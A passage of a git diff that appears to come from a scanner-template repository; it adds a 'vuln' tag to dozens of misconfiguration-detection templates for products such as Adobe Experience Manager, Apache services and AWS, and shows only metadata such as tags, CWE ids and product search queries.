http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml index fa8a6b971a2..b515695c72a 100644 --- a/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml @@ -15,7 +15,7 @@ info: vendor: adobe product: acs_aem_commons shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe,misconfig + tags: aem,adobe,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-secrets.yaml b/http/misconfiguration/aem/aem-secrets.yaml index 14203ba129f..01093e6ff3e 100644 --- a/http/misconfiguration/aem/aem-secrets.yaml +++ b/http/misconfiguration/aem/aem-secrets.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 2 - tags: aem,adobe,misconfig,exposure + tags: aem,adobe,misconfig,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-security-users.yaml b/http/misconfiguration/aem/aem-security-users.yaml index 71a80a2dbf0..551e642ffcf 100644 --- a/http/misconfiguration/aem/aem-security-users.yaml +++ b/http/misconfiguration/aem/aem-security-users.yaml @@ -12,7 +12,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-setpreferences-xss.yaml b/http/misconfiguration/aem/aem-setpreferences-xss.yaml index 5951041973f..fce7c50ba1a 100644 --- a/http/misconfiguration/aem/aem-setpreferences-xss.yaml +++ b/http/misconfiguration/aem/aem-setpreferences-xss.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.component:"Adobe Experience Manager" product: experience_manager vendor: adobe - tags: aem,xss,misconfig + tags: aem,xss,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-sling-userinfo.yaml b/http/misconfiguration/aem/aem-sling-userinfo.yaml index 9b4c8ad6772..e56974781a7 100644 --- a/http/misconfiguration/aem/aem-sling-userinfo.yaml +++ b/http/misconfiguration/aem/aem-sling-userinfo.yaml @@ -15,7 +15,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-userinfo-servlet.yaml b/http/misconfiguration/aem/aem-userinfo-servlet.yaml index 79eae76248c..f4124f8f7b4 100644 --- a/http/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/http/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -12,7 +12,7 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml index aab0ee8c1ad..cd7f231c36b 100644 --- a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml +++ b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig,intrusive + tags: aem,misconfig,intrusive,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-xss-childlist-selector.yaml b/http/misconfiguration/aem/aem-xss-childlist-selector.yaml index 96c46994264..46297f21214 100644 --- a/http/misconfiguration/aem/aem-xss-childlist-selector.yaml +++ b/http/misconfiguration/aem/aem-xss-childlist-selector.yaml @@ -18,7 +18,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe,misconfig + tags: xss,aem,adobe,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/crxde-lite.yaml b/http/misconfiguration/aem/crxde-lite.yaml index 27e68e9effe..b8f2d364ad1 100644 --- a/http/misconfiguration/aem/crxde-lite.yaml +++ b/http/misconfiguration/aem/crxde-lite.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 verified: true - tags: aem,crxde,exposure,adobe,misconfig + tags: aem,crxde,exposure,adobe,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/airflow/airflow-debug.yaml b/http/misconfiguration/airflow/airflow-debug.yaml index 13feabbe2d4..18ce6aead31 100644 --- a/http/misconfiguration/airflow/airflow-debug.yaml +++ b/http/misconfiguration/airflow/airflow-debug.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: airflow shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,fpd,misconfig + tags: apache,airflow,fpd,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/airflow/unauthenticated-airflow.yaml b/http/misconfiguration/airflow/unauthenticated-airflow.yaml index fca5baf54bb..46ba1c59a79 100644 --- a/http/misconfiguration/airflow/unauthenticated-airflow.yaml +++ b/http/misconfiguration/airflow/unauthenticated-airflow.yaml @@ -12,7 +12,7 @@ info: vendor: apache product: airflow shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth,misconfig + tags: apache,airflow,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/akamai/akamai-arl-xss.yaml b/http/misconfiguration/akamai/akamai-arl-xss.yaml index bfbcf625677..c43eae50da5 100644 --- a/http/misconfiguration/akamai/akamai-arl-xss.yaml +++ b/http/misconfiguration/akamai/akamai-arl-xss.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: max-request: 1 - tags: akamai,xss,misconfig + tags: akamai,xss,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml index 4dff3952e23..4ea826213fb 100644 --- a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml +++ b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml @@ -15,7 +15,7 @@ info: metadata: verified: true max-request: 204 - tags: cache,poisoning,xss,akamai,s3,misconfig + tags: cache,poisoning,xss,akamai,s3,misconfig,vuln variables: rand: "{{rand_base(5)}}" diff --git a/http/misconfiguration/alibaba-mongoshake-unauth.yaml b/http/misconfiguration/alibaba-mongoshake-unauth.yaml index 725a9cc36b4..cc8a6cf7723 100644 --- a/http/misconfiguration/alibaba-mongoshake-unauth.yaml +++ b/http/misconfiguration/alibaba-mongoshake-unauth.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: mongoshake,unauth,alibaba,misconfig + tags: mongoshake,unauth,alibaba,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/ampache-update-exposure.yaml b/http/misconfiguration/ampache-update-exposure.yaml index 1836c19161e..0888454f47b 100644 --- a/http/misconfiguration/ampache-update-exposure.yaml +++ b/http/misconfiguration/ampache-update-exposure.yaml @@ -13,7 +13,7 @@ info: vendor: ampache product: ampache shodan-query: http.html:"Ampache Update" - tags: misconfig,ampache,exposure + tags: misconfig,ampache,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/ampps-dirlisting.yaml b/http/misconfiguration/ampps-dirlisting.yaml index 24dcc095245..a281c3d015e 100644 --- a/http/misconfiguration/ampps-dirlisting.yaml +++ b/http/misconfiguration/ampps-dirlisting.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: panel,ampps,softaculous,misconfig + tags: panel,ampps,softaculous,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/amr-printer-management-unauth.yaml b/http/misconfiguration/amr-printer-management-unauth.yaml index b8398e6664b..cbe95fc8ac2 100644 --- a/http/misconfiguration/amr-printer-management-unauth.yaml +++ b/http/misconfiguration/amr-printer-management-unauth.yaml @@ -11,7 +11,7 @@ info: verified: true shodan-query: title:"AMR Printer Management" fofa-query: title="AMR Printer Management" - tags: network,iot,printer,misconfig,unauth + tags: network,iot,printer,misconfig,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/android-debug-database-exposed.yaml b/http/misconfiguration/android-debug-database-exposed.yaml index 1a73baf1caf..0991c97436e 100644 --- a/http/misconfiguration/android-debug-database-exposed.yaml +++ b/http/misconfiguration/android-debug-database-exposed.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Android Debug Database" - tags: unauth,android,misconfig + tags: unauth,android,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/anteon-dashboard-unauth.yaml b/http/misconfiguration/anteon-dashboard-unauth.yaml index dcf277af009..05f2c6f2708 100644 --- a/http/misconfiguration/anteon-dashboard-unauth.yaml +++ b/http/misconfiguration/anteon-dashboard-unauth.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="Anteon:" - tags: anteon,misconfig,dashboard,unauth + tags: anteon,misconfig,dashboard,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/apache-drill-exposure.yaml b/http/misconfiguration/apache-drill-exposure.yaml index 2a94ba66cf3..6bdf05df175 100644 --- a/http/misconfiguration/apache-drill-exposure.yaml +++ b/http/misconfiguration/apache-drill-exposure.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: drill shodan-query: title:"Apache Drill" - tags: misconfig,exposure,apache,drill + tags: misconfig,exposure,apache,drill,vuln http: - method: GET diff --git a/http/misconfiguration/apache-druid-unauth.yaml b/http/misconfiguration/apache-druid-unauth.yaml index 920755e7e2c..508c834a7d2 100644 --- a/http/misconfiguration/apache-druid-unauth.yaml +++ b/http/misconfiguration/apache-druid-unauth.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: druid shodan-query: title:"Apache Druid" - tags: misconfig,druid,unauth,apache + tags: misconfig,druid,unauth,apache,vuln http: - method: GET diff --git a/http/misconfiguration/apache-impala.yaml b/http/misconfiguration/apache-impala.yaml index 9ce985712d7..6860f32711f 100644 --- a/http/misconfiguration/apache-impala.yaml +++ b/http/misconfiguration/apache-impala.yaml @@ -15,7 +15,7 @@ info: vendor: apache product: impala shodan-query: http.favicon.hash:587330928 - tags: misconfig,apache,impala + tags: misconfig,apache,impala,vuln http: - method: GET diff --git a/http/misconfiguration/apache-struts-showcase.yaml b/http/misconfiguration/apache-struts-showcase.yaml index 98c499df003..c5d3f5f09c8 100644 --- a/http/misconfiguration/apache-struts-showcase.yaml +++ b/http/misconfiguration/apache-struts-showcase.yaml @@ -15,7 +15,7 @@ info: vendor: apache product: struts shodan-query: title:"Struts2 Showcase" - tags: apache,struts,showcase,misconfig,exposure + tags: apache,struts,showcase,misconfig,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/apache/apache-couchdb-unauth.yaml b/http/misconfiguration/apache/apache-couchdb-unauth.yaml index 85684617cd2..37cf3a8332a 100644 --- a/http/misconfiguration/apache/apache-couchdb-unauth.yaml +++ b/http/misconfiguration/apache/apache-couchdb-unauth.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: product:"CouchDB" fofa-query: app="APACHE-CouchDB" - tags: apache,couchdb,unauth,misconfig + tags: apache,couchdb,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/apache/apache-filename-enum.yaml b/http/misconfiguration/apache/apache-filename-enum.yaml index 0ed7859429c..fb3b314278e 100644 --- a/http/misconfiguration/apache/apache-filename-enum.yaml +++ b/http/misconfiguration/apache/apache-filename-enum.yaml @@ -10,7 +10,7 @@ info: - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ metadata: max-request: 1 - tags: apache,misconfig,hackerone + tags: apache,misconfig,hackerone,vuln http: - method: GET diff --git a/http/misconfiguration/apache/apache-hbase-unauth.yaml b/http/misconfiguration/apache/apache-hbase-unauth.yaml index b6873736f00..2aa3df4f5df 100644 --- a/http/misconfiguration/apache/apache-hbase-unauth.yaml +++ b/http/misconfiguration/apache/apache-hbase-unauth.yaml @@ -7,7 +7,7 @@ info: description: Apache Hbase is exposed. metadata: max-request: 1 - tags: apache,unauth,misconfig + tags: apache,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/apache/apache-nifi-unauth.yaml b/http/misconfiguration/apache/apache-nifi-unauth.yaml index 5fe0ce89aa0..e1a296692fc 100644 --- a/http/misconfiguration/apache/apache-nifi-unauth.yaml +++ b/http/misconfiguration/apache/apache-nifi-unauth.yaml @@ -20,7 +20,7 @@ info: fofa-query: title="nifi" && body="Did you mean" product: nifi vendor: apache - tags: misconfig,apache,nifi,unauth + tags: misconfig,apache,nifi,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/apache/apache-server-status-localhost.yaml b/http/misconfiguration/apache/apache-server-status-localhost.yaml index 67e8f46108f..5fb59da7a9b 100644 --- a/http/misconfiguration/apache/apache-server-status-localhost.yaml +++ b/http/misconfiguration/apache/apache-server-status-localhost.yaml @@ -8,7 +8,7 @@ info: Apache Server Status page is exposed, which may contain information about pages visited by the users, their IPs or sensitive information such as session tokens. metadata: max-request: 2 - tags: apache,debug,misconfig + tags: apache,debug,misconfig,vuln flow: http(1) && http(2) diff --git a/http/misconfiguration/apache/apache-server-status.yaml b/http/misconfiguration/apache/apache-server-status.yaml index bfda0264569..1a5dcdc8e5e 100644 --- a/http/misconfiguration/apache/apache-server-status.yaml +++ b/http/misconfiguration/apache/apache-server-status.yaml @@ -16,7 +16,7 @@ info: google-query: - site:*/server-status intext:"Apache server status for" - site:*/server-info intext:"Apache server Information" - tags: misconfig,exposure,apache,debug + tags: misconfig,exposure,apache,debug,vuln http: - method: GET diff --git a/http/misconfiguration/apache/apache-storm-unauth.yaml b/http/misconfiguration/apache/apache-storm-unauth.yaml index e6c7c905f8c..9d43db09983 100644 --- a/http/misconfiguration/apache/apache-storm-unauth.yaml +++ b/http/misconfiguration/apache/apache-storm-unauth.yaml @@ -9,7 +9,7 @@ info: - https://storm.apache.org/releases/current/STORM-UI-REST-API.html metadata: max-request: 1 - tags: apache,unauth,misconfig + tags: apache,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/apache/apache-tomcat-manager-path-normalization.yaml b/http/misconfiguration/apache/apache-tomcat-manager-path-normalization.yaml index 33ba612fb2d..0cfa4b0704a 100644 --- a/http/misconfiguration/apache/apache-tomcat-manager-path-normalization.yaml +++ b/http/misconfiguration/apache/apache-tomcat-manager-path-normalization.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 6 - tags: panel,tomcat,apache,misconfig,intrusive + tags: panel,tomcat,apache,misconfig,intrusive,vuln http: - method: GET diff --git a/http/misconfiguration/apache/apache-zeppelin-unauth.yaml b/http/misconfiguration/apache/apache-zeppelin-unauth.yaml index b14909ea6e9..d36a5e0c6db 100644 --- a/http/misconfiguration/apache/apache-zeppelin-unauth.yaml +++ b/http/misconfiguration/apache/apache-zeppelin-unauth.yaml @@ -20,7 +20,7 @@ info: fofa-query: title="Zeppelin" product: zeppelin vendor: apache - tags: misconfig,apache,zeppelin,unauth + tags: misconfig,apache,zeppelin,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/apache/kafka-manager-unauth.yaml b/http/misconfiguration/apache/kafka-manager-unauth.yaml index d824d61fc7d..8d32422c034 100644 --- a/http/misconfiguration/apache/kafka-manager-unauth.yaml +++ b/http/misconfiguration/apache/kafka-manager-unauth.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 fofa-query: app="Kafka-Manager" - tags: misconfig,apache,kafka,unauth,exposure + tags: misconfig,apache,kafka,unauth,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/apachespark-ui-exposed.yaml b/http/misconfiguration/apachespark-ui-exposed.yaml index 8b890cf9e5b..93b81efede1 100644 --- a/http/misconfiguration/apachespark-ui-exposed.yaml +++ b/http/misconfiguration/apachespark-ui-exposed.yaml @@ -15,7 +15,7 @@ info: product: spark shodan-query: title:"spark master at" fofa-query: title="spark master at" - tags: spark,pyspark,ui,exposed,panel,apache + tags: spark,pyspark,ui,exposed,panel,apache,vuln http: - method: GET diff --git a/http/misconfiguration/apc-info.yaml b/http/misconfiguration/apc-info.yaml index d2faabd7df4..20e788d224b 100644 --- a/http/misconfiguration/apc-info.yaml +++ b/http/misconfiguration/apc-info.yaml @@ -7,7 +7,7 @@ info: description: APCu service is vulnerable to information leakage. metadata: max-request: 2 - tags: config,service,apcu,misconfig + tags: config,service,apcu,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/apollo-adminservice-unauth.yaml b/http/misconfiguration/apollo-adminservice-unauth.yaml index 5b7c9533943..3d523044f6c 100644 --- a/http/misconfiguration/apollo-adminservice-unauth.yaml +++ b/http/misconfiguration/apollo-adminservice-unauth.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.html:"apollo-adminservice" product: apollo vendor: ctrip - tags: misconfig,unauth,apollo,apolloadminservice + tags: misconfig,unauth,apollo,apolloadminservice,vuln http: - method: GET diff --git a/http/misconfiguration/apple-cups-exposure.yaml b/http/misconfiguration/apple-cups-exposure.yaml index b8292969197..6d89c6a0091 100644 --- a/http/misconfiguration/apple-cups-exposure.yaml +++ b/http/misconfiguration/apple-cups-exposure.yaml @@ -16,7 +16,7 @@ info: vendor: apple product: cups shodan-query: html:"Home - CUPS" - tags: apple,cups,exposure,misconfig + tags: apple,cups,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/application-yaml.yaml b/http/misconfiguration/application-yaml.yaml index a4fa7a71659..937c4925eea 100644 --- a/http/misconfiguration/application-yaml.yaml +++ b/http/misconfiguration/application-yaml.yaml @@ -7,7 +7,7 @@ info: description: Finds Application YAML files which often contain sensitive information. metadata: max-request: 4 - tags: misconfig + tags: misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/ariang-debug-console.yaml b/http/misconfiguration/ariang-debug-console.yaml index ec2949650d6..c3c153cbcaa 100644 --- a/http/misconfiguration/ariang-debug-console.yaml +++ b/http/misconfiguration/ariang-debug-console.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Ariang" - tags: exposure,ariang,debug,console,misconfig + tags: exposure,ariang,debug,console,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/artifactory-anonymous-deploy.yaml b/http/misconfiguration/artifactory-anonymous-deploy.yaml index d14824feb64..1856b9d361c 100644 --- a/http/misconfiguration/artifactory-anonymous-deploy.yaml +++ b/http/misconfiguration/artifactory-anonymous-deploy.yaml @@ -9,7 +9,7 @@ info: - https://www.errno.fr/artifactory/Attacking_Artifactory.html metadata: max-request: 1 - tags: artifactory,misconfig + tags: artifactory,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aspx-debug-mode.yaml b/http/misconfiguration/aspx-debug-mode.yaml index afceac5225d..2ea9584ea25 100644 --- a/http/misconfiguration/aspx-debug-mode.yaml +++ b/http/misconfiguration/aspx-debug-mode.yaml @@ -8,7 +8,7 @@ info: - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled metadata: max-request: 1 - tags: debug,misconfig + tags: debug,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/atlantis-dashboard.yaml b/http/misconfiguration/atlantis-dashboard.yaml index 2795ef70bdf..c80ca2cb723 100644 --- a/http/misconfiguration/atlantis-dashboard.yaml +++ b/http/misconfiguration/atlantis-dashboard.yaml @@ -13,7 +13,7 @@ info: product: atlantis shodan-query: http.favicon.hash:"-1706783005" fofa-query: icon_hash=-1706783005 - tags: misconfig,atlantis,runatlantis,exposure + tags: misconfig,atlantis,runatlantis,exposure,discovery http: - method: GET diff --git a/http/misconfiguration/atlassian-bamboo-build.yaml b/http/misconfiguration/atlassian-bamboo-build.yaml index b333d83fbde..4a7187a7b38 100644 --- a/http/misconfiguration/atlassian-bamboo-build.yaml +++ b/http/misconfiguration/atlassian-bamboo-build.yaml @@ -12,7 +12,7 @@ info: vendor: atlassian product: bamboo shodan-query: title:"Build Dashboard - Atlassian Bamboo" - tags: misconfig,atlassian,bamboo + tags: misconfig,atlassian,bamboo,vuln http: - method: GET diff --git a/http/misconfiguration/aws/aws-ec2-status.yaml b/http/misconfiguration/aws/aws-ec2-status.yaml index 83f11127934..33437f3a2c9 100644 --- a/http/misconfiguration/aws/aws-ec2-status.yaml +++ b/http/misconfiguration/aws/aws-ec2-status.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Amazon EC2 Status" - tags: misconfig,ec2,aws,amazon + tags: misconfig,ec2,aws,amazon,vuln http: - method: GET diff --git a/http/misconfiguration/aws/aws-object-listing.yaml b/http/misconfiguration/aws/aws-object-listing.yaml index 8a2b9aa0d18..a2fe896a417 100644 --- a/http/misconfiguration/aws/aws-object-listing.yaml +++ b/http/misconfiguration/aws/aws-object-listing.yaml @@ -9,7 +9,7 @@ info: - https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 metadata: max-request: 1 - tags: aws,misconfig,bucket + tags: aws,misconfig,bucket,vuln http: - method: GET diff --git a/http/misconfiguration/aws/aws-redirect.yaml b/http/misconfiguration/aws/aws-redirect.yaml index 5bf2a59470d..46aba77ad32 100644 --- a/http/misconfiguration/aws/aws-redirect.yaml +++ b/http/misconfiguration/aws/aws-redirect.yaml @@ -8,7 +8,7 @@ info: - https://link.medium.com/fgXKJHR9P7 metadata: max-request: 1 - tags: aws,takeover,misconfig + tags: aws,takeover,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aws/aws-s3-explorer.yaml b/http/misconfiguration/aws/aws-s3-explorer.yaml index e8e2d2eebcd..52c92fa8fcd 100644 --- a/http/misconfiguration/aws/aws-s3-explorer.yaml +++ b/http/misconfiguration/aws/aws-s3-explorer.yaml @@ -18,7 +18,7 @@ info: google-query: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer" product: aws_javascript_s3_explorer vendor: amazon - tags: s3,edb,misconfig,aws,amazon + tags: s3,edb,misconfig,aws,amazon,vuln http: - method: GET diff --git a/http/misconfiguration/aws/aws-xray-application.yaml b/http/misconfiguration/aws/aws-xray-application.yaml index 3c9edb108e5..1bf709d2959 100644 --- a/http/misconfiguration/aws/aws-xray-application.yaml +++ b/http/misconfiguration/aws/aws-xray-application.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: title:"AWS X-Ray Sample Application" - tags: misconfig,aws,x-ray,amazon + tags: misconfig,aws,x-ray,amazon,vuln http: - method: GET diff --git a/http/misconfiguration/aws/awstats-listing.yaml b/http/misconfiguration/aws/awstats-listing.yaml index f84bb620798..a5b46c7f9c9 100644 --- a/http/misconfiguration/aws/awstats-listing.yaml +++ b/http/misconfiguration/aws/awstats-listing.yaml @@ -7,7 +7,7 @@ info: description: Searches for exposed awstats Internal Information. metadata: max-request: 1 - tags: misconfig,aws,exposure,amazon,awstats,oss + tags: misconfig,aws,exposure,amazon,awstats,oss,vuln http: - method: GET diff --git a/http/misconfiguration/aws/cdn-cache-poisoning.yaml b/http/misconfiguration/aws/cdn-cache-poisoning.yaml index 2a4ad717b88..b351628ccef 100644 --- a/http/misconfiguration/aws/cdn-cache-poisoning.yaml +++ b/http/misconfiguration/aws/cdn-cache-poisoning.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: X-Amz-Server-Side-Encryption - tags: cache,aws,poisoning,cdn,misconfig + tags: cache,aws,poisoning,cdn,misconfig,vuln variables: string: "{{to_lower(rand_base(8))}}={{to_lower(rand_base(8))}}" diff --git a/http/misconfiguration/bitbucket-auth-bypass.yaml b/http/misconfiguration/bitbucket-auth-bypass.yaml index c4cb4e4cb00..994ccd0476d 100644 --- a/http/misconfiguration/bitbucket-auth-bypass.yaml +++ b/http/misconfiguration/bitbucket-auth-bypass.yaml @@ -17,7 +17,7 @@ info: product: bitbucket_data_center shodan-query: title:"Log in - Bitbucket" fofa-query: title="Log in - Bitbucket" - tags: misconfig,atlassian,bitbucket,auth-bypass + tags: misconfig,atlassian,bitbucket,auth-bypass,vuln http: - method: GET diff --git a/http/misconfiguration/bitbucket-public-repository.yaml b/http/misconfiguration/bitbucket-public-repository.yaml index 5f3209d4b76..5b7fc80b695 100644 --- a/http/misconfiguration/bitbucket-public-repository.yaml +++ b/http/misconfiguration/bitbucket-public-repository.yaml @@ -13,7 +13,7 @@ info: vendor: atlassian product: bitbucket shodan-query: http.component:"Bitbucket" - tags: misconfig,bitbucket + tags: misconfig,bitbucket,vuln http: - method: GET diff --git a/http/misconfiguration/blackbox-exporter-metrics.yaml b/http/misconfiguration/blackbox-exporter-metrics.yaml index fc3f49c7553..102d6da47dd 100644 --- a/http/misconfiguration/blackbox-exporter-metrics.yaml +++ b/http/misconfiguration/blackbox-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"Blackbox Exporter" - tags: blackbox,exposure,debug,misconfig + tags: blackbox,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/bootstrap-admin-panel-template.yaml b/http/misconfiguration/bootstrap-admin-panel-template.yaml index f0a4e06585e..214d6ea0e12 100644 --- a/http/misconfiguration/bootstrap-admin-panel-template.yaml +++ b/http/misconfiguration/bootstrap-admin-panel-template.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Dashboard - Bootstrap Admin Template" product: responsive_bootstrap_admin_template vendor: teamworktec - tags: bootstrap,panel,misconfig,exposure + tags: bootstrap,panel,misconfig,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/bravia-signage.yaml b/http/misconfiguration/bravia-signage.yaml index 6003e438657..43c3daaca27 100644 --- a/http/misconfiguration/bravia-signage.yaml +++ b/http/misconfiguration/bravia-signage.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 shodan-query: title:"BRAVIA Signage" - tags: misconfig,exposure,bravia,sony + tags: misconfig,exposure,bravia,sony,vuln http: - method: GET diff --git a/http/misconfiguration/browserless-debugger.yaml b/http/misconfiguration/browserless-debugger.yaml index 35362f1b41c..dd121cada5c 100644 --- a/http/misconfiguration/browserless-debugger.yaml +++ b/http/misconfiguration/browserless-debugger.yaml @@ -14,7 +14,7 @@ info: vendor: browserless product: chrome shodan-query: http.title:"browserless debugger" - tags: browserless,unauth,debug,misconfig + tags: browserless,unauth,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/cadvisor-exposure.yaml b/http/misconfiguration/cadvisor-exposure.yaml index eb23c386177..2ca86708ddb 100644 --- a/http/misconfiguration/cadvisor-exposure.yaml +++ b/http/misconfiguration/cadvisor-exposure.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"cAdvisor" - tags: exposure,misconfig,dashboard + tags: exposure,misconfig,dashboard,vuln http: - method: GET diff --git a/http/misconfiguration/canon-c3325-unauth.yaml b/http/misconfiguration/canon-c3325-unauth.yaml index dcb9190ec11..93089a001e7 100644 --- a/http/misconfiguration/canon-c3325-unauth.yaml +++ b/http/misconfiguration/canon-c3325-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"c3325" - tags: canon,c3325,unauth,exposure + tags: canon,c3325,unauth,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/casdoor-unauth-operations.yaml b/http/misconfiguration/casdoor-unauth-operations.yaml index e8aa554bc17..36087b7cfe0 100644 --- a/http/misconfiguration/casdoor-unauth-operations.yaml +++ b/http/misconfiguration/casdoor-unauth-operations.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 3 shodan-query: html:"Casdoor" - tags: casdoor,unauth,intrusive,misconfig + tags: casdoor,unauth,intrusive,misconfig,vuln variables: username: "{{randstr}}" diff --git a/http/misconfiguration/casdoor-users-password.yaml b/http/misconfiguration/casdoor-users-password.yaml index 2d7a95c3cad..a1f4901aa46 100644 --- a/http/misconfiguration/casdoor-users-password.yaml +++ b/http/misconfiguration/casdoor-users-password.yaml @@ -16,7 +16,7 @@ info: vendor: casbin product: casdoor fofa-query: title="Casdoor" - tags: casdoor,exposure,misconfig,disclosure + tags: casdoor,exposure,misconfig,disclosure,vuln http: - method: GET diff --git a/http/misconfiguration/cgi-test-page.yaml b/http/misconfiguration/cgi-test-page.yaml index 7b33ad33197..03ad111aa4a 100644 --- a/http/misconfiguration/cgi-test-page.yaml +++ b/http/misconfiguration/cgi-test-page.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: cgi,misconfig + tags: cgi,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/changedetection-unauth.yaml b/http/misconfiguration/changedetection-unauth.yaml index 36f68e4f303..8ff8b90d71e 100644 --- a/http/misconfiguration/changedetection-unauth.yaml +++ b/http/misconfiguration/changedetection-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Change Detection" - tags: changedetection,unauth,exposure + tags: changedetection,unauth,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/chatgpt-web-unauth.yaml b/http/misconfiguration/chatgpt-web-unauth.yaml index 16a44e1716b..7bfcbfc8208 100644 --- a/http/misconfiguration/chatgpt-web-unauth.yaml +++ b/http/misconfiguration/chatgpt-web-unauth.yaml @@ -13,7 +13,7 @@ info: vendor: chanzhaoyu product: chatgpt_web fofa-query: app="Chatgpt-web" - tags: chatgpt,unauth,misconfig + tags: chatgpt,unauth,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/clickhouse-unauth-api.yaml b/http/misconfiguration/clickhouse-unauth-api.yaml index 93b3eac8f38..f3c2ba0a168 100644 --- a/http/misconfiguration/clickhouse-unauth-api.yaml +++ b/http/misconfiguration/clickhouse-unauth-api.yaml @@ -17,7 +17,7 @@ info: product: clickhouse shodan-query: "X-ClickHouse-Summary" fofa-query: "X-ClickHouse-Summary" - tags: 